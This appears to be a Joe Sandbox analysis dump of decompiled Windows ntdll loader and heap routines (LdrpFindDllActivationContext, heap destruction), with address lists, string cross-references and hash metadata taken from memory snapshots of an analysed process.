                                                                                                                                                                                      							if( *((intOrPtr*)(_t24 + 2)) == _t39 &&  *((intOrPtr*)(_t24 + 4)) == _t39 &&  *((intOrPtr*)(_t24 + 6)) == _t47 &&  *((intOrPtr*)(_t24 + 8)) != 0 &&  *((short*)(_t24 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t24 + 0xc)) == _t47) {
                                                                                                                                                                                      								_t24 = _t24 + 8;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t48 =  *0x1d9365e4; // 0x7726f0e0
                                                                                                                                                                                      					 *0x1d9391e0(_t40, _t24,  &_v8);
                                                                                                                                                                                      					_t45 =  *_t48();
                                                                                                                                                                                      					if(_t45 >= 0) {
                                                                                                                                                                                      						L8:
                                                                                                                                                                                      						_t27 = _v8;
                                                                                                                                                                                      						if(_t27 != 0) {
                                                                                                                                                                                      							if( *((intOrPtr*)(_t42 + 0x48)) != 0) {
                                                                                                                                                                                      								E1D8426A0(_t27,  *((intOrPtr*)(_t42 + 0x48)));
                                                                                                                                                                                      								_t27 = _v8;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *((intOrPtr*)(_t42 + 0x48)) = _t27;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t45 < 0) {
                                                                                                                                                                                      							if(( *0x1d9337c0 & 0x00000003) != 0) {
                                                                                                                                                                                      								E1D8BE692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t45);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(( *0x1d9337c0 & 0x00000010) != 0) {
                                                                                                                                                                                      								asm("int3");
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_t45 != 0xc000008a) {
                                                                                                                                                                                      						if(_t45 != 0xc000008b && _t45 != 0xc0000089 && _t45 != 0xc000000f && _t45 != 0xc0000204 && _t45 != 0xc0000002) {
                                                                                                                                                                                      							if(_t45 != 0xc00000bb) {
                                                                                                                                                                                      								goto L8;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(( *0x1d9337c0 & 0x00000005) != 0) {
                                                                                                                                                                                      						_push(_t45);
                                                                                                                                                                                      						_t18 = _t42 + 0x24; // 0x123
                                                                                                                                                                                      						E1D8BE692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t18);
                                                                                                                                                                                      						_t49 = _t49 + 0x1c;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t45 = 0;
                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}















                                                                                                                                                                                      0x1d874c42
                                                                                                                                                                                      0x1d874c47
                                                                                                                                                                                      0x1d874c4a
                                                                                                                                                                                      0x1d874c4c
                                                                                                                                                                                      0x1d874c52
                                                                                                                                                                                      0x1d874cb8
                                                                                                                                                                                      0x1d874cbe
                                                                                                                                                                                      0x1d874cbe
                                                                                                                                                                                      0x1d874c5a
                                                                                                                                                                                      0x1d874c5d
                                                                                                                                                                                      0x1d874c69
                                                                                                                                                                                      0x1d874c6f
                                                                                                                                                                                      0x1d874c74
                                                                                                                                                                                      0x1d874cd6
                                                                                                                                                                                      0x1d874cda
                                                                                                                                                                                      0x1d8b33b9
                                                                                                                                                                                      0x1d8b33be
                                                                                                                                                                                      0x1d8b33f7
                                                                                                                                                                                      0x1d8b33f7
                                                                                                                                                                                      0x1d8b33be
                                                                                                                                                                                      0x1d874cda
                                                                                                                                                                                      0x1d874c76
                                                                                                                                                                                      0x1d874c84
                                                                                                                                                                                      0x1d874c8c
                                                                                                                                                                                      0x1d874c90
                                                                                                                                                                                      0x1d874ca9
                                                                                                                                                                                      0x1d874ca9
                                                                                                                                                                                      0x1d874cae
                                                                                                                                                                                      0x1d874ce4
                                                                                                                                                                                      0x1d874cee
                                                                                                                                                                                      0x1d874cf3
                                                                                                                                                                                      0x1d874cf3
                                                                                                                                                                                      0x1d874ce6
                                                                                                                                                                                      0x1d874ce6
                                                                                                                                                                                      0x1d874cb2
                                                                                                                                                                                      0x1d8b3463
                                                                                                                                                                                      0x1d8b347b
                                                                                                                                                                                      0x1d8b3480
                                                                                                                                                                                      0x1d8b348a
                                                                                                                                                                                      0x1d8b3490
                                                                                                                                                                                      0x1d8b3490
                                                                                                                                                                                      0x1d8b348a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d874cb2
                                                                                                                                                                                      0x1d874c98
                                                                                                                                                                                      0x1d874cc5
                                                                                                                                                                                      0x1d8b3429
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b342f
                                                                                                                                                                                      0x1d874cc5
                                                                                                                                                                                      0x1d874ca1
                                                                                                                                                                                      0x1d8b3434
                                                                                                                                                                                      0x1d8b3435
                                                                                                                                                                                      0x1d8b344f
                                                                                                                                                                                      0x1d8b3454
                                                                                                                                                                                      0x1d8b3454
                                                                                                                                                                                      0x1d874ca7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 1D8B3466
                                                                                                                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1D8B3439
                                                                                                                                                                                      • LdrpFindDllActivationContext, xrefs: 1D8B3440, 1D8B346C
                                                                                                                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 1D8B344A, 1D8B3476
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                      • API String ID: 3446177414-3779518884
                                                                                                                                                                                      • Opcode ID: 244e8e155b5477ab05465eaabfe1ab72561ed25d414a6c0c50f9f8487fd6a96c
                                                                                                                                                                                      • Instruction ID: d0e804866d6ff3ba362b94e960f0c2a4fbf397ac63778fee2adaa81271ae76b9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 244e8e155b5477ab05465eaabfe1ab72561ed25d414a6c0c50f9f8487fd6a96c
                                                                                                                                                                                      • Instruction Fuzzy Hash: A2310776E042A6FFDB129B1C8884B76B3A4BB91758F06C16AF84557251D7709D80C393
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 65%
                                                                                                                                                                                      			E1D83F8B0(signed int __edx, signed int _a4) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                      				void* _v54;
                                                                                                                                                                                      				void* _v60;
                                                                                                                                                                                      				void* _v64;
                                                                                                                                                                                      				char _v88;
                                                                                                                                                                                      				void* _v90;
                                                                                                                                                                                      				signed int _v92;
                                                                                                                                                                                      				char _v96;
                                                                                                                                                                                      				void* _v100;
                                                                                                                                                                                      				void* _v104;
                                                                                                                                                                                      				void* _v108;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				signed int _t62;
                                                                                                                                                                                      				intOrPtr _t64;
                                                                                                                                                                                      				intOrPtr _t73;
                                                                                                                                                                                      				signed int* _t86;
                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                      				signed int _t91;
                                                                                                                                                                                      				char* _t92;
                                                                                                                                                                                      				char _t96;
                                                                                                                                                                                      				void* _t102;
                                                                                                                                                                                      				signed int* _t105;
                                                                                                                                                                                      				intOrPtr _t106;
                                                                                                                                                                                      				void* _t107;
                                                                                                                                                                                      				signed int* _t110;
                                                                                                                                                                                      				signed int _t111;
                                                                                                                                                                                      				char* _t118;
                                                                                                                                                                                      				signed int _t121;
                                                                                                                                                                                      				signed int _t127;
                                                                                                                                                                                      				void* _t128;
                                                                                                                                                                                      				void* _t129;
                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                      				signed int _t132;
                                                                                                                                                                                      				void* _t139;
                                                                                                                                                                                      				signed int _t161;
                                                                                                                                                                                      				void* _t162;
                                                                                                                                                                                      				void* _t164;
                                                                                                                                                                                      				intOrPtr* _t166;
                                                                                                                                                                                      				void* _t169;
                                                                                                                                                                                      				signed int* _t170;
                                                                                                                                                                                      				signed int* _t171;
                                                                                                                                                                                      				signed int _t174;
                                                                                                                                                                                      				signed int _t176;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t158 = __edx;
                                                                                                                                                                                      				_t176 = (_t174 & 0xfffffff8) - 0x64;
                                                                                                                                                                                      				_v8 =  *0x1d93b370 ^ _t176;
                                                                                                                                                                                      				_push(_t128);
                                                                                                                                                                                      				_t161 = _a4;
                                                                                                                                                                                      				if(_t161 == 0) {
                                                                                                                                                                                      					__eflags =  *0x1d936960 - 2;
                                                                                                                                                                                      					if( *0x1d936960 >= 2) {
                                                                                                                                                                                      						_t64 =  *[fs:0x30];
                                                                                                                                                                                      						__eflags =  *(_t64 + 0xc);
                                                                                                                                                                                      						if( *(_t64 + 0xc) == 0) {
                                                                                                                                                                                      							_push("HEAP: ");
                                                                                                                                                                                      							E1D83B910();
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							E1D83B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_push("(HeapHandle != NULL)");
                                                                                                                                                                                      						E1D83B910();
                                                                                                                                                                                      						__eflags =  *0x1d935da8;
                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                      							_t139 = 2;
                                                                                                                                                                                      							E1D8FFC95(_t128, _t139, _t161, __eflags);
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L26:
                                                                                                                                                                                      					_t62 = 0;
                                                                                                                                                                                      					L27:
                                                                                                                                                                                      					_pop(_t162);
                                                                                                                                                                                      					_pop(_t164);
                                                                                                                                                                                      					_pop(_t129);
                                                                                                                                                                                      					return E1D884B50(_t62, _t129, _v8 ^ _t176, _t158, _t162, _t164);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if( *((intOrPtr*)(_t161 + 8)) == 0xddeeddee) {
                                                                                                                                                                                      					_t73 =  *[fs:0x30];
                                                                                                                                                                                      					__eflags = _t161 -  *((intOrPtr*)(_t73 + 0x18));
                                                                                                                                                                                      					if(_t161 ==  *((intOrPtr*)(_t73 + 0x18))) {
                                                                                                                                                                                      						L30:
                                                                                                                                                                                      						_t62 = _t161;
                                                                                                                                                                                      						goto L27;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t141 =  *(_t161 + 0x10);
                                                                                                                                                                                      					__eflags =  *(_t161 + 0x10);
                                                                                                                                                                                      					if( *(_t161 + 0x10) != 0) {
                                                                                                                                                                                      						_t158 = _t161;
                                                                                                                                                                                      						E1D8E78DE(_t141, _t161, 0, 8, 0);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					E1D83FD8E(_t161, _t158);
                                                                                                                                                                                      					E1D9002EC(_t161);
                                                                                                                                                                                      					_t158 = 1;
                                                                                                                                                                                      					E1D83918A(_t161, 1, 0, 0);
                                                                                                                                                                                      					E1D908E26(_t161);
                                                                                                                                                                                      					goto L26;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if(( *(_t161 + 0x44) & 0x01000000) != 0) {
                                                                                                                                                                                      					_t166 =  *0x1d933758; // 0x0
                                                                                                                                                                                      					 *0x1d9391e0(_t161);
                                                                                                                                                                                      					_t62 =  *_t166();
                                                                                                                                                                                      					goto L27;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t7 = _t161 + 0x58; // 0x8953046a
                                                                                                                                                                                      				_t147 =  *_t7;
                                                                                                                                                                                      				if( *_t7 != 0) {
                                                                                                                                                                                      					_t158 = _t161;
                                                                                                                                                                                      					E1D8E78DE(_t147, _t161, 0, 8, 0);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				E1D83FD8E(_t161, _t158);
                                                                                                                                                                                      				if(( *(_t161 + 0x40) & 0x61000000) != 0) {
                                                                                                                                                                                      					__eflags =  *(_t161 + 0x40) & 0x10000000;
                                                                                                                                                                                      					if(( *(_t161 + 0x40) & 0x10000000) != 0) {
                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t127 = E1D8EF85F(_t161);
                                                                                                                                                                                      					__eflags = _t127;
                                                                                                                                                                                      					if(_t127 == 0) {
                                                                                                                                                                                      						goto L30;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					L5:
                                                                                                                                                                                      					if(_t161 ==  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
                                                                                                                                                                                      						goto L30;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						E1D84FED0(0x1d934800);
                                                                                                                                                                                      						L1D83FAEC(_t161);
                                                                                                                                                                                      						_push(0x1d934800);
                                                                                                                                                                                      						E1D84E740(_t161);
                                                                                                                                                                                      						_t86 = _t161 + 0x9c;
                                                                                                                                                                                      						_t131 =  *_t86;
                                                                                                                                                                                      						while(_t86 != _t131) {
                                                                                                                                                                                      							_t87 = _t131;
                                                                                                                                                                                      							_t158 =  &_v92;
                                                                                                                                                                                      							_t131 =  *_t131;
                                                                                                                                                                                      							_v92 = _t87 & 0xffff0000;
                                                                                                                                                                                      							_v96 = 0;
                                                                                                                                                                                      							E1D83FABA( &_v92,  &_v96, 0x8000);
                                                                                                                                                                                      							_t91 = E1D853C40();
                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                      							if(_t91 == 0) {
                                                                                                                                                                                      								_t92 = 0x7ffe0388;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags =  *_t92;
                                                                                                                                                                                      							if( *_t92 != 0) {
                                                                                                                                                                                      								_t158 = _v92;
                                                                                                                                                                                      								L1D8FDA30(_t131, _t161, _v92, _v96);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t86 = _t161 + 0x9c;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if( *((char*)(_t161 + 0xea)) == 2) {
                                                                                                                                                                                      							_t96 =  *((intOrPtr*)(_t161 + 0xe4));
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t96 = 0;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t96 != 0) {
                                                                                                                                                                                      							 *(_t176 + 0x1c) = _t96;
                                                                                                                                                                                      							_t158 = _t176 + 0x1c;
                                                                                                                                                                                      							_v88 = 0;
                                                                                                                                                                                      							E1D83FABA(_t176 + 0x1c,  &_v88, 0x8000);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t132 = _t161 + 0x88;
                                                                                                                                                                                      						if( *_t132 != 0) {
                                                                                                                                                                                      							 *((intOrPtr*)(_t176 + 0x24)) = 0;
                                                                                                                                                                                      							_t158 = _t132;
                                                                                                                                                                                      							E1D83FABA(_t132, _t176 + 0x24, 0x8000);
                                                                                                                                                                                      							 *_t132 = 0;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(( *(_t161 + 0x40) & 0x00000001) == 0) {
                                                                                                                                                                                      							 *((intOrPtr*)(_t161 + 0xc8)) = 0;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                      						L16:
                                                                                                                                                                                      						_t169 =  *((intOrPtr*)(_t161 + 0xa8)) - 0x10;
                                                                                                                                                                                      						E1D83FA44(_t169);
                                                                                                                                                                                      						if(_t169 != _t161) {
                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t102 = E1D853C40();
                                                                                                                                                                                      							_t170 = 0x7ffe0380;
                                                                                                                                                                                      							if(_t102 != 0) {
                                                                                                                                                                                      								_t105 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t105 = 0x7ffe0380;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if( *_t105 != 0) {
                                                                                                                                                                                      								_t106 =  *[fs:0x30];
                                                                                                                                                                                      								__eflags =  *(_t106 + 0x240) & 0x00000001;
                                                                                                                                                                                      								if(( *(_t106 + 0x240) & 0x00000001) != 0) {
                                                                                                                                                                                      									_t121 = E1D853C40();
                                                                                                                                                                                      									__eflags = _t121;
                                                                                                                                                                                      									if(_t121 != 0) {
                                                                                                                                                                                      										_t170 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                                                                                      										__eflags = _t170;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									 *((short*)(_t176 + 0x2a)) = 0x1023;
                                                                                                                                                                                      									_push(_t176 + 0x24);
                                                                                                                                                                                      									_push(4);
                                                                                                                                                                                      									_push(0x402);
                                                                                                                                                                                      									_push( *_t170 & 0x000000ff);
                                                                                                                                                                                      									 *(_t176 + 0x54) = _t161;
                                                                                                                                                                                      									E1D882F90();
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t107 = E1D853C40();
                                                                                                                                                                                      							_t171 = 0x7ffe038a;
                                                                                                                                                                                      							if(_t107 != 0) {
                                                                                                                                                                                      								_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t110 = 0x7ffe038a;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if( *_t110 != 0) {
                                                                                                                                                                                      								_t111 = E1D853C40();
                                                                                                                                                                                      								__eflags = _t111;
                                                                                                                                                                                      								if(_t111 != 0) {
                                                                                                                                                                                      									_t171 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                                                                                                      									__eflags = _t171;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *((short*)(_t176 + 0x4e)) = 0x1023;
                                                                                                                                                                                      								_push(_t176 + 0x48);
                                                                                                                                                                                      								_push(4);
                                                                                                                                                                                      								_push(0x402);
                                                                                                                                                                                      								_push( *_t171 & 0x000000ff);
                                                                                                                                                                                      								_v8 = _t161;
                                                                                                                                                                                      								E1D882F90();
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(E1D853C40() != 0) {
                                                                                                                                                                                      								_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t118 = 0x7ffe0388;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if( *_t118 != 0) {
                                                                                                                                                                                      								E1D8FD9C6(_t161);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L26;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}


















































                                                                                                                                                                                      0x1d83f8b0
                                                                                                                                                                                      0x1d83f8b8
                                                                                                                                                                                      0x1d83f8c2
                                                                                                                                                                                      0x1d83f8c6
                                                                                                                                                                                      0x1d83f8c9
                                                                                                                                                                                      0x1d83f8ce
                                                                                                                                                                                      0x1d89e467
                                                                                                                                                                                      0x1d89e46e
                                                                                                                                                                                      0x1d89e474
                                                                                                                                                                                      0x1d89e47a
                                                                                                                                                                                      0x1d89e47e
                                                                                                                                                                                      0x1d89e49d
                                                                                                                                                                                      0x1d89e4a2
                                                                                                                                                                                      0x1d89e480
                                                                                                                                                                                      0x1d89e495
                                                                                                                                                                                      0x1d89e49a
                                                                                                                                                                                      0x1d89e4a8
                                                                                                                                                                                      0x1d89e4ad
                                                                                                                                                                                      0x1d89e4b2
                                                                                                                                                                                      0x1d89e4ba
                                                                                                                                                                                      0x1d89e4c2
                                                                                                                                                                                      0x1d89e4c3
                                                                                                                                                                                      0x1d89e4c3
                                                                                                                                                                                      0x1d89e4ba
                                                                                                                                                                                      0x1d83f9f6
                                                                                                                                                                                      0x1d83f9f6
                                                                                                                                                                                      0x1d83f9f8
                                                                                                                                                                                      0x1d83f9fc
                                                                                                                                                                                      0x1d83f9fd
                                                                                                                                                                                      0x1d83f9fe
                                                                                                                                                                                      0x1d83fa09
                                                                                                                                                                                      0x1d83fa09
                                                                                                                                                                                      0x1d83f8db
                                                                                                                                                                                      0x1d89e4cd
                                                                                                                                                                                      0x1d89e4d3
                                                                                                                                                                                      0x1d89e4d6
                                                                                                                                                                                      0x1d83fa37
                                                                                                                                                                                      0x1d83fa37
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d83fa37
                                                                                                                                                                                      0x1d89e4dc
                                                                                                                                                                                      0x1d89e4e1
                                                                                                                                                                                      0x1d89e4e3
                                                                                                                                                                                      0x1d89e4e9
                                                                                                                                                                                      0x1d89e4eb
                                                                                                                                                                                      0x1d89e4eb
                                                                                                                                                                                      0x1d89e4f2
                                                                                                                                                                                      0x1d89e4f9
                                                                                                                                                                                      0x1d89e504
                                                                                                                                                                                      0x1d89e505
                                                                                                                                                                                      0x1d89e50c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d89e50c
                                                                                                                                                                                      0x1d83f8e8
                                                                                                                                                                                      0x1d89e516
                                                                                                                                                                                      0x1d89e51f
                                                                                                                                                                                      0x1d89e525
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d89e525
                                                                                                                                                                                      0x1d83f8ee
                                                                                                                                                                                      0x1d83f8ee
                                                                                                                                                                                      0x1d83f8f5
                                                                                                                                                                                      0x1d89e530
                                                                                                                                                                                      0x1d89e532
                                                                                                                                                                                      0x1d89e532
                                                                                                                                                                                      0x1d83f8fd
                                                                                                                                                                                      0x1d83f909
                                                                                                                                                                                      0x1d89e53c
                                                                                                                                                                                      0x1d89e543
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d89e54b
                                                                                                                                                                                      0x1d89e550
                                                                                                                                                                                      0x1d89e552
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d83f90f
                                                                                                                                                                                      0x1d83f90f
                                                                                                                                                                                      0x1d83f918
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d83f91e
                                                                                                                                                                                      0x1d83f924
                                                                                                                                                                                      0x1d83f92b
                                                                                                                                                                                      0x1d83f930
                                                                                                                                                                                      0x1d83f931
                                                                                                                                                                                      0x1d83f936
                                                                                                                                                                                      0x1d83f93c
                                                                                                                                                                                      0x1d83f93e
                                                                                                                                                                                      0x1d89e55d
                                                                                                                                                                                      0x1d89e55f
                                                                                                                                                                                      0x1d89e563
                                                                                                                                                                                      0x1d89e56a
                                                                                                                                                                                      0x1d89e578
                                                                                                                                                                                      0x1d89e57c
                                                                                                                                                                                      0x1d89e581
                                                                                                                                                                                      0x1d89e586
                                                                                                                                                                                      0x1d89e588
                                                                                                                                                                                      0x1d89e59a
                                                                                                                                                                                      0x1d89e58a
                                                                                                                                                                                      0x1d89e593
                                                                                                                                                                                      0x1d89e593
                                                                                                                                                                                      0x1d89e59f
                                                                                                                                                                                      0x1d89e5a2
                                                                                                                                                                                      0x1d89e5a8
                                                                                                                                                                                      0x1d89e5ae
                                                                                                                                                                                      0x1d89e5ae
                                                                                                                                                                                      0x1d89e5b3
                                                                                                                                                                                      0x1d89e5b3
                                                                                                                                                                                      0x1d83f94d
                                                                                                                                                                                      0x1d83fa0c
                                                                                                                                                                                      0x1d83f953
                                                                                                                                                                                      0x1d83f953
                                                                                                                                                                                      0x1d83f953
                                                                                                                                                                                      0x1d83f957
                                                                                                                                                                                      0x1d83fa17
                                                                                                                                                                                      0x1d83fa1b
                                                                                                                                                                                      0x1d83fa28
                                                                                                                                                                                      0x1d83fa2d
                                                                                                                                                                                      0x1d83fa2d
                                                                                                                                                                                      0x1d83f95d
                                                                                                                                                                                      0x1d83f965
                                                                                                                                                                                      0x1d89e5c7
                                                                                                                                                                                      0x1d89e5cc
                                                                                                                                                                                      0x1d89e5ce
                                                                                                                                                                                      0x1d89e5d3
                                                                                                                                                                                      0x1d89e5d3
                                                                                                                                                                                      0x1d83f96f
                                                                                                                                                                                      0x1d83f981
                                                                                                                                                                                      0x1d83f981
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d83f987
                                                                                                                                                                                      0x1d83f98d
                                                                                                                                                                                      0x1d83f992
                                                                                                                                                                                      0x1d83f999
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d83f99b
                                                                                                                                                                                      0x1d83f99b
                                                                                                                                                                                      0x1d83f9a0
                                                                                                                                                                                      0x1d83f9ac
                                                                                                                                                                                      0x1d89e5e3
                                                                                                                                                                                      0x1d83f9b2
                                                                                                                                                                                      0x1d83f9b2
                                                                                                                                                                                      0x1d83f9b2
                                                                                                                                                                                      0x1d83f9b7
                                                                                                                                                                                      0x1d89e5ea
                                                                                                                                                                                      0x1d89e5f0
                                                                                                                                                                                      0x1d89e5f7
                                                                                                                                                                                      0x1d89e5fd
                                                                                                                                                                                      0x1d89e602
                                                                                                                                                                                      0x1d89e604
                                                                                                                                                                                      0x1d89e60f
                                                                                                                                                                                      0x1d89e60f
                                                                                                                                                                                      0x1d89e60f
                                                                                                                                                                                      0x1d89e618
                                                                                                                                                                                      0x1d89e621
                                                                                                                                                                                      0x1d89e622
                                                                                                                                                                                      0x1d89e624
                                                                                                                                                                                      0x1d89e62c
                                                                                                                                                                                      0x1d89e62d
                                                                                                                                                                                      0x1d89e631
                                                                                                                                                                                      0x1d89e631
                                                                                                                                                                                      0x1d89e5f7
                                                                                                                                                                                      0x1d83f9bd
                                                                                                                                                                                      0x1d83f9c2
                                                                                                                                                                                      0x1d83f9ce
                                                                                                                                                                                      0x1d89e644
                                                                                                                                                                                      0x1d83f9d4
                                                                                                                                                                                      0x1d83f9d4
                                                                                                                                                                                      0x1d83f9d4
                                                                                                                                                                                      0x1d83f9d9
                                                                                                                                                                                      0x1d89e64b
                                                                                                                                                                                      0x1d89e650
                                                                                                                                                                                      0x1d89e652
                                                                                                                                                                                      0x1d89e65d
                                                                                                                                                                                      0x1d89e65d
                                                                                                                                                                                      0x1d89e65d
                                                                                                                                                                                      0x1d89e666
                                                                                                                                                                                      0x1d89e66f
                                                                                                                                                                                      0x1d89e670
                                                                                                                                                                                      0x1d89e672
                                                                                                                                                                                      0x1d89e67a
                                                                                                                                                                                      0x1d89e67b
                                                                                                                                                                                      0x1d89e67f
                                                                                                                                                                                      0x1d89e67f
                                                                                                                                                                                      0x1d83f9e6
                                                                                                                                                                                      0x1d89e692
                                                                                                                                                                                      0x1d83f9ec
                                                                                                                                                                                      0x1d83f9ec
                                                                                                                                                                                      0x1d83f9ec
                                                                                                                                                                                      0x1d83f9f4
                                                                                                                                                                                      0x1d83fa3d
                                                                                                                                                                                      0x1d83fa3d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d83f9f4
                                                                                                                                                                                      0x1d83f999
                                                                                                                                                                                      0x1d83f918

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                      • API String ID: 3446177414-3610490719
                                                                                                                                                                                      • Opcode ID: 1de07a7f6ed2845a3ecc9da20908a7c397bb59caedaba39d0221516b5f49a794
                                                                                                                                                                                      • Instruction ID: 2532c1890d86d10163b499cea5512999f16b313316ef9118d1d8e1c08dd176f9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1de07a7f6ed2845a3ecc9da20908a7c397bb59caedaba39d0221516b5f49a794
